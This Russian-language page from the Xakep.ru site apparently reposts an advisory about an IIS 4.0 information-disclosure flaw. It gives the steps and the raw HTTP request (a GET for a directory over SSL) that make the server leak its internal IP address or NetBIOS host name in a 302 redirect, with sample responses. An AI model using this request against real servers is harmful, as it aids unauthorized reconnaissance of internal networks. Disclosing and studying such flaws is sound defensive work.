Продукты «Хакера»

  • Свежий печатный выпуск

    Свежий печатный выпуск

    20+ лучших статей квартала. 240 страниц

    2000 ₽ + доставка СДЭК

    Заказать журнал
  • Годовая подписка на Xakep.ru -40%, успей сэкономить!

    Годовая подписка на Xakep.ru

    Полный доступ к крутым статьям и архиву

    6000 ₽ / год

    Подписаться
  • Вход в тему пентеста от Хакера

    Вход в тему пентеста от Хакера

    Статьи, видеоуроки и задачи. Разработано Хакером

    7000 ₽ - доступ навсегда

    Купить курс
  • Спецвыпуск Хакера  №4. Лучшее за 2021-2022

    Спецвыпуск Хакера №4. Лучшее за 2021-2022

    22 статьи. 240 страниц. Автоматизируем Burp +

    2000 ₽ + доставка СДЭК

    Заказать журнал

e-Synergies обнаружили и исследовали уязвимость в Internet Information Server. Успешная эксплуатация этой уязвимости может показать критическую внутреннюю информацию типа внутреннего IP адреса или внутреннего имени хоста.
Информацию можно получить, соединяясь вручную с TCP/443 портом (SSL) (например, используя Perl (SSLeay)).

Эксплоит: 

1-Просматриваем интернет сайт, используя SSL броузер и находим любой каталог.
К примеру: https://www.target.com/images/icon.gif 

2-Используем совместимый SSL Perl сценарий, выполните следующую команду:  

GET /images HTTP/1.0 (если не получится попробуйте HTTP/1.1)

3- Результат должен выглядеть следующим образом: 

HTTP/1.1 302 Object Moved 
Location: https://192.168.1.10/images/ 
Server: Microsoft-IIS/4.0 
Content-Type: text/html 
Content-Length: xxx 

Или 

HTTP/1.1 302 Object Moved 
Location: https://netbiosname/images/ 
Server: Microsoft-IIS/4.0 
Content-Type: text/html 
Content-Length: xxx

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Старые
    Новые Популярные
    Межтекстовые Отзывы
    Посмотреть все комментарии